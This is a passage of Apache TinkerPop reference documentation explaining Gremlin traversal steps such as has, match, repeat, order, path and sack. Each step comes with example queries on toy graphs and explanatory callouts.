graph?\"\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').values('age').groupCount()\ng.V().hasLabel('person').groupCount().by('age') <1>\n----\n\n<1> You can also supply a pre-group projection, where the provided <<by-step,`by()`>>-modulation determines what to group the incoming object by.\n\nThere is one person that is 32, one person that is 35, one person that is 27, and one person that is 29.\n\n \"Iteratively walk the graph and count the number of times you see the second letter of each name.\"\n\nimage::groupcount-step.png[width=420]\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m').by(label)).times(10).cap('m')\n----\n\nThe above is interesting in that it demonstrates the use of referencing the internal `Map<Object,Long>` of `groupCount()` with a string variable. Given that `groupCount()` is a sideEffect-step, it simply passes the object it received to its output. Internal to `groupCount()`, the object's count is incremented.\n\n[[has-step]]\nHas Step\n~~~~~~~~\n\nimage::has-step.png[width=670]\n\nIt is possible to filter vertices, edges, and vertex properties based on their properties using `has()`-step (*filter*). There are numerous variations on `has()` including:\n\n * `has(key,value)`: Remove the traverser if its element does not have the provided key\/value property.\n * `has(key,predicate)`: Remove the traverser if its element does not have a key value that satisfies the bi-predicate.\n * `hasLabel(labels...)`: Remove the traverser if its element does not have any of the labels.\n * `hasId(ids...)`: Remove the traverser if its element does not have any of the ids.\n * `hasKey(keys...)`: Remove the traverser if its property does not have any of the keys.\n * `hasValue(values...)`: Remove the traverser if its property does not have any of the values.\n * `has(key)`: Remove the traverser if its element does not have a value for the key.\n * `hasNot(key)`: Remove the traverser if its element has a value for the key.\n * `has(key, traversal)`: Remove the traverser if its object does not yield a result through the traversal off the property value.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person')\ng.V().hasLabel('person').out().has('name',within('vadas','josh'))\ng.V().hasLabel('person').out().has('name',within('vadas','josh')).\n outE().hasLabel('created')\ng.V().has('age',inside(20,30)).values('age') <1>\ng.V().has('age',outside(20,30)).values('age') <2>\ng.V().has('name',within('josh','marko')).valueMap() <3>\ng.V().has('name',without('josh','marko')).valueMap() <4>\ng.V().has('name',not(within('josh','marko'))).valueMap() <5>\n----\n\n<1> Find all vertices whose ages are between 20 (inclusive) and 30 (exclusive).\n<2> Find all vertices whose ages are not between 20 (inclusive) and 30 (exclusive).\n<3> Find all vertices whose names are exact matches to any names in the the collection `[josh,marko]`, display all the key,value pairs for those verticies.\n<4> Find all vertices whose names are not in the collection `[josh,marko]`, display all the key,value pairs for those vertices.\n<5> Same as the prior example save using `not` on `within` to yield `without`.\n\nTinkerPop does not support a regular expression predicate, although specific graph databases that leverage TinkerPop may\nprovide a partial match extension.\n\n[[inject-step]]\nInject Step\n~~~~~~~~~~~\n\nimage::inject-step.png[width=800]\n\nOne of the major features of TinkerPop3 is \"injectable steps.\" This makes it possible to insert objects arbitrarily into a traversal stream. In general, `inject()`-step (*sideEffect*) exists and a few examples are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(4).out().values('name').inject('daniel')\ng.V(4).out().values('name').inject('daniel').map {it.get().length()}\ng.V(4).out().values('name').inject('daniel').map {it.get().length()}.path()\n----\n\nIn the last example above, note that the path starting with `daniel` is only of length 2. This is because the `daniel` string was inserted half-way in the traversal. Finally, a typical use case is provided below -- when the start of the traversal is not a graph object.\n\n[gremlin-groovy,modern]\n----\ninject(1,2)\ninject(1,2).map {it.get() + 1}\ninject(1,2).map {it.get() + 1}.map {g.V(it.get()).next()}.values('name')\n----\n\n[[is-step]]\nIs Step\n~~~~~~~\n\nIt is possible to filter scalar values using `is()`-step (*filter*).\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').is(32)\ng.V().values('age').is(lte(30))\ng.V().values('age').is(inside(30, 40))\ng.V().where(__.in('created').count().is(1)).values('name') <1>\ng.V().where(__.in('created').count().is(gte(2))).values('name') <2>\ng.V().where(__.in('created').values('age').\n mean().is(inside(30d, 35d))).values('name') <3>\n----\n\n<1> Find projects having exactly one contributor.\n<2> Find projects having two or more contributors.\n<3> Find projects whose contributors average age is between 30 and 35.\n\n[[limit-step]]\nLimit Step\n~~~~~~~~~~\n\nThe `limit()`-step is analogous to <<range-step,`range()`-step>> save that the lower end range is set to 0.\n\n[gremlin-groovy,modern]\n----\ng.V().limit(2)\ng.V().range(0, 2)\ng.V().limit(2).toString()\n----\n\nThe `limit()`-step can also be applied with `Scope.local`, in which case it operates on the incoming collection. The examples below use the <<the-crew-toy-graph,The Crew>> toy data set.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap().select('location').limit(local,2) <1>\ng.V().valueMap().limit(local, 1) <2>\n----\n\n<1> `List<String>` for each vertex containing the first two locations.\n<2> `Map<String, Object>` for each vertex, but containing only the first property value.\n\n[[local-step]]\nLocal Step\n~~~~~~~~~~\n\nimage::local-step.png[width=450]\n\nA `GraphTraversal` operates on a continuous stream of objects. In many situations, it is important to operate on a single element within that stream. To do such object-local traversal computations, `local()`-step exists (*branch*). Note that the examples below use the <<the-crew-toy-graph,The Crew>> toy data set.\n\n[gremlin-groovy,theCrew]\n----\ng.V().as('person').\n properties('location').order().by('startTime',incr).limit(2).value().as('location').\n select('person','location').by('name').by() <1>\ng.V().as('person').\n local(properties('location').order().by('startTime',incr).limit(2)).value().as('location').\n select('person','location').by('name').by() <2>\n----\n\n<1> Get the first two people and their respective location according to the most historic location start time.\n<2> For every person, get their two most historic locations.\n\nThe two traversals above look nearly identical save the inclusion of `local()` which wraps a section of the traversal in a object-local traversal. As such, the `order().by()` and the `limit()` refer to a particular object, not to the stream as a whole.\n\nWARNING: The anonymous traversal of `local()` processes the current object \"locally.\" In OLAP, where the atomic unit of computing is the the vertex and its local \"star graph,\" it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.\n\n[[mapkeys-step]]\nMapKeys Step\n~~~~~~~~~~~~\n \nThe `mapKeys()`-step (*flatMap*) takes an incoming map and emits its keys. This is especially useful when one is only interested in the top N elements in a `groupCount()` ranking.\n \n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\ng.V().hasLabel(\"song\").out(\"followedBy\").groupCount().by(\"name\").\n order(local).by(valueDecr).limit(local, 5)\ng.V().hasLabel(\"song\").out(\"followedBy\").groupCount().by(\"name\").\n order(local).by(valueDecr).limit(local, 5).mapKeys()\n----\n\n[[mapvalues-step]]\nMapValues Step\n~~~~~~~~~~~~~~\n \nThe `mapValues()`-step (*flatMap*) takes an incoming map and emits its values.\n \n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\n:set max-iteration 10\ng.V().hasLabel(\"song\").out(\"sungBy\").groupCount().by(\"name\").next() <1>\ng.V().hasLabel(\"song\").out(\"sungBy\").groupCount().by(\"name\").mapValues() <2>\ng.V().hasLabel(\"song\").out(\"sungBy\").groupCount().by(\"name\").mapValues().groupCount().\n order(local).by(valueDecr).limit(local, 5).next() <3>\n----\n \n<1> Which artist sung how many songs?\n<2> Get an anonymized set of song repertoire sizes.\n<3> What are the 5 most common song repertoire sizes?\n\n[[match-step]]\nMatch Step\n~~~~~~~~~~\n\nThe `match()`-step (*map*) provides a more link:http:\/\/en.wikipedia.org\/wiki\/Declarative_programming[declarative] form of graph querying based on the notion of link:http:\/\/en.wikipedia.org\/wiki\/Pattern_matching[pattern matching]. With `match()`, the user provides a collection of \"traversal fragments,\" called patterns, that have variables defined that must hold true throughout the duration of the `match()`. When a traverser is in `match()`, a registered `MatchAlgorithm` analyzes the current state of the traverser (i.e. its history based on its <<path-data-structure,path data>>), the runtime statistics of the traversal patterns, and returns a traversal-pattern that the traverser should try next. The default `MatchAlgorithm` provided is called `CountMatchAlgorithm` and it dynamically revises the pattern execution plan by sorting the patterns according to their filtering capabilities (i.e. largest set reduction patterns execute first). For very large graphs, where the developer is uncertain of the statistics of the graph (e.g. how many `knows`-edges vs. `worksFor`-edges exist in the graph), it is advantageous to use `match()`, as an optimal plan will be determined automatically. Furthermore, some queries are much easier to express via `match()` than with single-path traversals.\n\n \"Who created a project named 'lop' that was also created by someone who is 29 years old? Return the two creators.\"\n\nimage::match-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').as('b'),\n __.as('b').has('name', 'lop'),\n __.as('b').in('created').as('c'),\n __.as('c').has('age', 29)).\n select('a','c').by('name')\n----\n\nNote that the above can also be more concisely written as below which demonstrates that standard inner-traversals can be arbitrarily defined.\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').has('name', 'lop').as('b'),\n __.as('b').in('created').has('age', 29).as('c')).\n select('a','c').by('name')\n----\n\n[[grateful-dead]]\n.Grateful Dead\nimage::grateful-dead-schema.png[width=475]\n\n`MatchStep` brings functionality similar to link:http:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin. Like SPARQL, MatchStep conjoins a set of patterns applied to a graph. For example, the following traversal finds exactly those songs which Jerry Garcia has both sung and written (using the Grateful Dead graph distributed in the `data\/` directory):\n\n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\ng.V().match(\n __.as('a').has('name', 'Garcia'),\n __.as('a').in('writtenBy').as('b'),\n __.as('a').in('sungBy').as('b')).\n select('b').values('name')\n----\n\nAmong the features which differentiate `match()` from SPARQL are:\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').has('name','lop').as('b'), <1>\n __.as('b').in('created').has('age', 29).as('c'),\n __.as('c').repeat(out()).times(2)). <2>\n select('c').out('knows').dedup().values('name') <3>\n----\n\n<1> *Patterns of arbitrary complexity*: `match()` is not restricted to triple patterns or property paths.\n<2> *Recursion support*: `match()` supports the branch-based steps within a pattern, including `repeat()`.\n<3> *Imperative\/declarative hybrid*: Before and after a `match()`, it is possible to leverage classic Gremlin traversals.\n\nTo extend point #3, it is possible to support going from imperative, to declarative, to imperative, ad infinitum.\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('knows').as('b'),\n __.as('b').out('created').has('name','lop')).\n select('b').out('created').\n match(\n __.as('x').in('created').as('y'),\n __.as('y').out('knows').as('z')).\n select('z').values('name')\n----\n\nIMPORTANT: The `match()`-step is stateless. The variable bindings of the traversal patterns are stored in the path history of the traverser. As such, the variables used over all `match()`-steps within a traversal are globally unique. A benefit of this is that subsequent `where()`, `select()`, `match()`, etc. steps can leverage the same variables in their analysis.\n\nLike all other steps in Gremlin, `match()` is a function and thus, `match()` within `match()` is a natural consequence of Gremlin's functional foundation (i.e. recursive matching).\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('knows').as('b'),\n __.as('b').out('created').has('name','lop'),\n __.as('b').match(\n __.as('b').out('created').as('c'),\n __.as('c').has('name','ripple')).\n select('c').as('c')).\n select('a','c').by('name')\n----\n\nIf a step-labeled traversal proceeds the `match()`-step and the traverser entering the `match()` is destined to bind to a particular variable, then the previous step should be labeled accordingly.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('knows').as('b').\n match(\n __.as('b').out('created').as('c'),\n __.not(__.as('c').in('created').as('a'))).\n select('a','b','c').by('name')\n----\n\nThere are three types of `match()` traversal patterns.\n\n . `as('a')...as('b')`: both the start and end of the traversal have a declared variable.\n . `as('a')...`: only the start of the traversal has a declared variable.\n . `...`: there are no declared variables.\n\nIf a variable is at the start of a traversal pattern it *must* exist as a label in the path history of the traverser else the traverser can not go down that path. If a variable is at the end of a traversal pattern then if the variable exists in the path history of the traverser, the traverser's current location *must* match (i.e. equal) its historic location at that same label. However, if the variable does not exist in the path history of the traverser, then the current location is labeled as the variable and thus, becomes a bound variable for subsequent traversal patterns. If a traversal pattern does not have an end label, then the traverser must simply \"survive\" the pattern (i.e. not be filtered) to continue to the next pattern. If a traversal pattern does not have a start label, then the traverser can go down that path at any point, but will only go down that pattern once as a traversal pattern is executed once and only once for the history of the traverser. Typically, traversal patterns that do not have a start and end label are used in conjunction with `and()`, `or()`, and `where()`. Once the traverser has \"survived\" all the patterns (or at least one for `or()`), `match()`-step analyzes the traverser's path history and emits a `Map<String,Object>` of the variable bindings to the next step in the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b'). <1>\n match( <2>\n __.as('a').out().count().as('c'), <3>\n __.not(__.as('a').in().as('b')), <4>\n or( <5>\n __.as('a').out('knows').as('b'),\n __.as('b').in().count().as('c').and().as('c').is(gt(2)))). <6>\n dedup('a','c'). <7>\n select('a','b','c').by('name').by('name').by() <8>\n----\n\n<1> A standard, step-labeled traversal can come prior to `match()`.\n<2> If the traverser's path prior to entering `match()` has requisite label values, then those historic values are bound.\n<3> It is possible to use <<a-note-on-barrier-steps,barrier steps>> though they are computed locally to the pattern (as one would expect).\n<4> It is possible to `not()` a pattern.\n<5> It is possible to nest `and()`- and `or()`-steps for conjunction matching.\n<6> Both infix and prefix conjunction notation is supported.\n<7> It is possible to \"distinct\" the specified label combination.\n<8> The bound values are of different types -- vertex (\"a\"), vertex (\"b\"), long (\"c\").\n\n[[using-where-with-match]]\nUsing Where with Match\n^^^^^^^^^^^^^^^^^^^^^^\n\nMatch is typically used in conjunction with both `select()` (demonstrated previously) and `where()` (presented here). A `where()`-step allows the user to further constrain the result set provided by `match()`.\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where('a', neq('c')).\n select('a','c').by('name')\n----\n\nThe `where()`-step can take either a `P`-predicate (example above) or a `Traversal` (example below). Using `MatchPredicateStrategy`, `where()`-clauses are automatically folded into `match()` and thus, subject to the query optimizer within `match()`-step.\n\n[gremlin-groovy,modern]\n----\ntraversal = g.V().match(\n __.as('a').has(label,'person'), <1>\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where(__.as('a').out('knows').as('c')). <2>\n select('a','c').by('name'); null <3>\ntraversal.toString() <4>\ntraversal <5> <6>\ntraversal.toString() <7>\n----\n\n<1> Any `has()`-step traversal patterns that start with the match-key are pulled out of `match()` to enable the vendor to leverage the filter for index lookups.\n<2> A `where()`-step with a traversal containing variable bindings declared in `match()`.\n<3> A useful trick to ensure that the traversal is not iterated by Gremlin Console.\n<4> The string representation of the traversal prior to its strategies being applied.\n<5> The Gremlin Console will automatically iterate anything that is an iterator or is iterable.\n<6> Both marko and josh are co-developers and marko knows josh.\n<7> The string representation of the traversal after the strategies have been applied (and thus, `where()` is folded into `match()`)\n\nIMPORTANT: A `where()`-step is a filter and thus, variables within a `where()` clause are not globally bound to the path of the traverser in `match()`. As such, `where()`-steps in `match()` are used for filtering, not binding.\n\n[[max-step]]\nMax Step\n~~~~~~~~\n\nThe `max()`-step (*map*) operates on a stream of numbers and determines which is the largest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').max()\ng.V().repeat(both()).times(3).values('age').max()\n----\n\nIMPORTANT: `max(local)` determines the max of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a max of `Double.NaN` is returned.\n\n[[mean-step]]\nMean Step\n~~~~~~~~~\n\nThe `mean()`-step (*map*) operates on a stream of numbers and determines the average of those numbers.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').mean()\ng.V().repeat(both()).times(3).values('age').mean() <1>\ng.V().repeat(both()).times(3).values('age').dedup().mean()\n----\n\n<1> Realize that traversers are being bulked by `repeat()`. There may be more of a particular number than another, thus altering the average.\n\nIMPORTANT: `mean(local)` determines the mean of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a mean of `Double.NaN` is returned.\n\n[[min-step]]\nMin Step\n~~~~~~~~\n\nThe `min()`-step (*map*) operates on a stream of numbers and determines which is the smallest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').min()\ng.V().repeat(both()).times(3).values('age').min()\n----\n\nIMPORTANT: `min(local)` determines the min of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a min of `Double.NaN` is returned.\n\n[[or-step]]\nOr Step\n~~~~~~~\n\nThe `or()`-step ensures that at least one of the provided traversals yield a result (*filter*). Please see <<and-step,`and()`>> for and-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().or(\n __.outE('created'),\n __.inE('created').count().is(gt(1))).\n values('name')\n----\n\nThe `or()`-step can take an arbitrary number of traversals. At least one of the traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. Though, with infix notation, only two traversals can be or'd together.\n\n[gremlin-groovy,modern]\n----\ng.V().where(outE('created').or().outE('knows')).values('name')\n----\n\n[[order-step]]\nOrder Step\n~~~~~~~~~~\n\nWhen the objects of the traversal stream need to be sorted, `order()`-step (*map*) can be leveraged.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name').order()\ng.V().values('name').order().by(decr)\ng.V().hasLabel('person').order().by('age', incr).values('name')\n----\n\nOne of the most traversed objects in a traversal is an `Element`. An element can have properties associated with it (i.e. key\/value pairs). In many situations, it is desirable to sort an element traversal stream according to a comparison of their properties.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name')\ng.V().order().by('name',incr).values('name')\ng.V().order().by('name',decr).values('name')\n----\n\nThe `order()`-step allows the user to provide an arbitrary number of comparators for primary, secondary, etc. sorting. In the example below, the primary ordering is based on the outgoing created-edge count. The secondary ordering is based on the age of the person.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').order().by(outE('created').count(), incr).\n by('age', incr).values('name')\ng.V().hasLabel('person').order().by(outE('created').count(), incr).\n by('age', decr).values('name')\n----\n\nRandomizing the order of the traversers at a particular point in the traversal is possible with `Order.shuffle`.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').order().by(shuffle)\ng.V().hasLabel('person').order().by(shuffle)\n----\n\nIMPORTANT: `order(local)` orders the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, the object is returned unchanged.\n\n[[path-step]]\nPath Step\n~~~~~~~~~\n\nA traverser is transformed as it moves through a series of steps within a traversal. The history of the traverser is realized by examining its path with `path()`-step (*map*).\n\nimage::path-step.png[width=650]\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().values('name')\ng.V().out().out().values('name').path()\n----\n\nIf edges are required in the path, then be sure to traverser those edges explicitly.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().inV().outE().inV().path()\n----\n\nIt is possible to post-process the elements of the path in a round-robin fashion via `by()`.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by('name').by('age')\n----\n\nFinally, because `by()`-based post-processing, nothing prevents triggering yet another traversal. In the traversal below, for each element of the path traversed thus far, if its a person (as determined by having an `age`-property), then get all of their creations, else if its a creation, get all the people that created it.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by(\n choose(hasLabel('person'),\n out('created').values('name'),\n __.in('created').values('name')).fold())\n----\n\nWARNING: Generating path information is expensive as the history of the traverser is stored into a Java list. With numerous traversers, there are numerous lists. Moreover, in an OLAP <<graphcomputer,`GraphComputer`>> environment this becomes exceedingly prohibitive as there are traversers emanating from all vertices in the graph in parallel. In OLAP there are optimizations provided for traverser populations, but when paths are calculated (and each traverser is unique due to its history), then these optimizations are no longer possible.\n\n[[path-data-structure]]\nPath Data Structure\n^^^^^^^^^^^^^^^^^^^\n\nThe `Path` data structure is an ordered list of objects, where each object is associated to a `Set<String>` of labels. An example is presented below to demonstrate both the `Path` API as well as how a traversal yields labeled paths.\n\nimage::path-data-structure.png[width=350]\n\n[gremlin-groovy,modern]\n----\npath = g.V(1).as('a').has('name').as('b').\n out('knows').out('created').as('c').\n has('name','ripple').values('name').as('d').\n identity().as('e').path().next()\npath.size()\npath.objects()\npath.labels()\npath.a\npath.b\npath.c\npath.d == path.e\n----\n\n[[profile-step]]\nProfile Step\n~~~~~~~~~~~~\n\nThe `profile()`-step (*sideEffect*) exists to allow developers to profile their traversals to determine statistical information like step runtime, counts, etc.\n\nWARNING: Profiling a Traversal will impede the Traversal's performance. This overhead is mostly excluded from the profile results, but durations are not exact. Thus, durations are best considered in relation to each other.\n\n[gremlin-groovy,modern]\n----\ng.V().out('created').repeat(both()).times(3).hasLabel('person').values('age').sum().profile().cap(TraversalMetrics.METRICS_KEY)\n----\n\nThe `profile()`-step generates a `TraversalMetrics` sideEffect object that contains the following information:\n\n* `Step`: A step within the traversal being profiled.\n* `Count`: The number of _represented_ traversers that passed through the step.\n* `Traversers`: The number of traversers that passed through the step.\n* `Time (ms)`: The total time the step was actively executing its behavior.\n* `% Dur`: The percentage of total time spent in the step.\n\nimage:gremlin-exercise.png[width=120,float=left] It is important to understand the difference between `Count` and `Traversers`. Traversers can be merged and as such, when two traversers are \"the same\" they may be aggregated into a single traverser. That new traverser has a `Traverser.bulk()` that is the sum of the two merged traverser bulks. On the other hand, the `Count` represents the sum of all `Traverser.bulk()` results and thus, expresses the number of \"represented\" (not enumerated) traversers. `Traversers` will always be less than or equal to `Count`.\n\n[[range-step]]\nRange Step\n~~~~~~~~~~\n\nAs traversers propagate through the traversal, it is possible to only allow a certain number of them to pass through with `range()`-step (*filter*). When the low-end of the range is not met, objects are continued to be iterated. When within the low and high range (both inclusive), traversers are emitted. Finally, when above the high range, the traversal breaks out of iteration.\n\n[gremlin-groovy,modern]\n----\ng.V().range(0,3)\ng.V().range(1,3)\ng.V().repeat(both()).times(1000000).emit().range(6,10)\n----\n\nThe `range()`-step can also be applied with `Scope.local`, in which case it operates on the incoming collection. For example, it is possible to produce a `Map<String, String>` for each traversed path, but containing only the second property value (the \"b\" step).\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b').in().as('c').select('a','b','c').by('name').range(local,1,2)\n----\n\nThe next example uses the <<the-crew-toy-graph,The Crew>> toy data set. It produces a `List<String>` containing the second and third location for each vertex.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap().select('location').range(local, 1, 3)\n----\n\n[[repeat-step]]\nRepeat Step\n~~~~~~~~~~~\n\nimage::gremlin-fade.png[width=350]\n\nThe `repeat()`-step (*branch*) is used for looping over a traversal given some break predicate. Below are some examples of `repeat()`-step in action.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).path().by('name') <1>\ng.V().until(has('name','ripple')).\n repeat(out()).path().by('name') <2>\n----\n\n<1> do-while semantics stating to do `out()` 2 times.\n<2> while-do semantics stating to break if the traverser is at a vertex named \"ripple\".\n\nIMPORTANT: There are two modulators for `repeat()`: `until()` and `emit()`. If `until()` comes after `repeat()` it is do\/while looping. If `until()` comes before `repeat()` it is while\/do looping. If `emit()` is placed after `repeat()`, it is evaluated on the traversers leaving the repeat-traversal. If `emit()` is placed before `repeat()`, it is evaluated on the traversers prior to entering the repeat-traversal.\n\nThe `repeat()`-step also supports an \"emit predicate\", where the predicate for an empty argument `emit()` is true (i.e. `emit() == emit{true}`). With `emit()`, the traverser is split in two -- the traverser exits the code block as well as continues back within the code block (assuming `until()` holds true).\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name') <1>\ng.V(1).emit().repeat(out()).times(2).path().by('name') <2>\n----\n\n<1> The `emit()` comes after `repeat()` and thus, emission happens after the `repeat()` traversal is executed. Thus, no one vertex paths exist.\n<2> The `emit()` comes before `repeat()` and thus, emission happens prior to the `repeat()` traversal being executed. Thus, one vertex paths exist.\n\nThe `emit()`-modulator can take an arbitrary predicate.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit(has('lang')).path().by('name')\n----\n\nimage::repeat-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name')\n----\n\nThe first time through the `repeat()`, the vertices lop, vadas, and josh are seen. Given that `loops==0`, the traverser repeats. However, because the emit-predicate is declared true, those vertices are emitted. At step 2 (`loops==1`), the vertices traversed are ripple and lop (Josh's created projects, as lop and vadas have no out edges) and are also emitted. Now `loops==1` so the traverser repeats. As ripple and lop have no out edges there are no vertices to traverse. Given that `loops==2`, the until-predicate fails. Therefore, the traverser has seen the vertices: lop, vadas, josh, ripple, and lop.\n\nFinally, note that both `emit()` and `until()` can take a traversal and in such, situations, the predicate is determined by `traversal.hasNext()`. A few examples are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).until(hasLabel('software')).path().by('name') <1>\ng.V(1).emit(hasLabel('person')).repeat(out()).path().by('name') <2>\ng.V(1).repeat(out()).until(outE().count().is(0)).path().by('name') <3>\n----\n\n<1> Starting from vertex 1, keep taking outgoing edges until a software vertex is reached.\n<2> Starting from vertex 1, and in an infinite loop, emit the vertex if it is a person and then traverser the outgoing edges.\n<3> Starting from vertex 1, keep taking outgoing edges until a vertex is reached that has no more outgoing edges.\n\nWARNING: The anonymous traversal of `emit()` and `until()` (not `repeat()`) process their current objects \"locally.\" In OLAP, where the atomic unit of computing is the the vertex and its local \"star graph,\" it is important that the anonymous traversals do not leave the confines of the vertex's star graph. In other words, they can not traverse to an adjacent vertex's properties or edges.\n\n[[sack-step]]\nSack Step\n~~~~~~~~~\n\nimage:gremlin-sacks-running.png[width=175,float=right] A traverser can contain a local data structure called a \"sack\". The `sack()`-step is used to read and write sacks (*sideEffect* or *map*). Each sack of each traverser is created when using `GraphTraversal.withSack(initialValueSupplier,splitOperator?,mergeOperator?)`.\n\n* *Initial value supplier*: A `Supplier` providing the initial value of each traverser's sack.\n* *Split operator*: a `UnaryOperator` that clones the traverser's sack when the traverser splits. If no split operator is provided, then `UnaryOperator.identity()` is assumed.\n* *Merge operator*: A `BinaryOperator` that unites two traverser's sack when they are merged. If no merge operator is provided, then traversers with sacks can not be merged.\n\nTwo trivial examples are presented below to demonstrate the *initial value supplier*. In the first example below, a traverser is created at each vertex in the graph (`g.V()`), with a 1.0 sack (`withSack(1.0f)`), and then the sack value is accessed (`sack()`). In the second example, a random float supplier is used to generate sack values.\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f).V().sack()\nrand = new Random()\ng.withSack {rand.nextFloat()}.V().sack()\n----\n\nA more complicated initial value supplier example is presented below where the sack values are used in a running computation and then emitted at the end of the traversal. When an edge is traversed, the edge weight is multiplied by the sack value (`sack(mult).by('weight')`). Note that the <<by-step,`by()`>>-modulator can be any arbitrary traversal.\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f).V().repeat(outE().sack(mult).by('weight').inV()).times(2)\ng.withSack(1.0f).V().repeat(outE().sack(mult).by('weight').inV()).times(2).sack()\ng.withSack(1.0f).V().repeat(outE().sack(mult).by('weight').inV()).times(2).path().\n by().by('weight')\n----\n\nimage:gremlin-sacks-standing.png[width=100,float=left] When complex objects are used (i.e. non-primitives), then a *split operator* should be defined to ensure that each traverser gets a clone of its parent's sack. The first example does not use a split operator and as such, the same map is propagated to all traversers (a global data structure). The second example, demonstrates how `Map.clone()` ensures that each traverser's sack contains a unique, local sack.\n\n[gremlin-groovy,modern]\n----\ng.withSack {[:]}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ BAD: single map\ng.withSack {[:]}{it.clone()}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ GOOD: cloned map\n----\n\nNOTE: For primitives (i.e. integers, longs, floats, etc.), a split operator is not required as a primitives are encoded in the memory address of the sack, not as a reference to an object.\n\nIf a *merge operator* is not provided, then traversers with sacks can not be bulked. However, in many situations, merging the sacks of two traversers at the same location is algorithmically sound and good to provide so as to gain the bulking optimization. In the examples below, the binary merge operator is `Operator.sum`. Thus, when two traverser merge, their respective sacks are added together.\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f,sum).V(1).local(outE('knows').barrier(normSack).inV()) <1>\ng.withSack(1.0f,sum).V(1).local(outE('knows').barrier(normSack).inV()).sack() <2>\ng.withSack(1.0f,sum).V(1).local(outE('knows').barrier(normSack).inV()).in('knows') <3>\ng.withSack(1.0f,sum).V(1).local(outE('knows').barrier(normSack).inV()).in('knows').sack() <4>\ng.withSack(1.0f,sum).V(1).local(outE('knows').barrier(normSack).inV()).in('knows').barrier().sack() <5>\ng.withSack(1.0f,sum).V(1).local(outE('knows').barrier(normSack).inV()).in('knows').barrier().sideEffect{it.setBulk(1)}.sack() <6>\n----\n\n<1> The knows-adjacent vertices of vertex 1 are vertices 2 and 4.\n<2> The `local(...barrier(normSack)...)` ensures that all traversers leaving vertex 1 have an evenly distributed amount of the initial 1.0 \"energy\" (50-50).\n<3> Going from vertices 2 and 4 yield two traversers at vertex 1.\n<4> Those two traversers each have a sack of 0.5.\n<5> The `barrier()` merges the two traversers at vertex 1 into a single traverser whose sack is 1.0.\n<6> There is now a single traverser with bulk of 2 and sack of 1.0 and thus, setting the bulk to 1 yields the expected 1.0.\n\n\n[[sample-step]]\nSample Step\n~~~~~~~~~~~\n\nThe `sample()`-step is useful for sampling some number of traversers previous in the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().sample(1).values('weight')\ng.V().outE().sample(1).by('weight').values('weight')\ng.V().outE().sample(2).by('weight').values('weight')\n----\n\nOne of the more interesting use cases for `sample()` is when it is used in conjunction with <<local-step,`local()`>>. The combination of the two steps supports the execution of link:http:\/\/en.wikipedia.org\/wiki\/Random_walk[random walks]. In the example below, the traversal starts are vertex 1 and selects one edge to traverse based on a probability distribution generated by the weights of the edges. The output is always a single path as by selecting a single edge, the traverser never splits and continues down a single path in the graph.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5)\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n 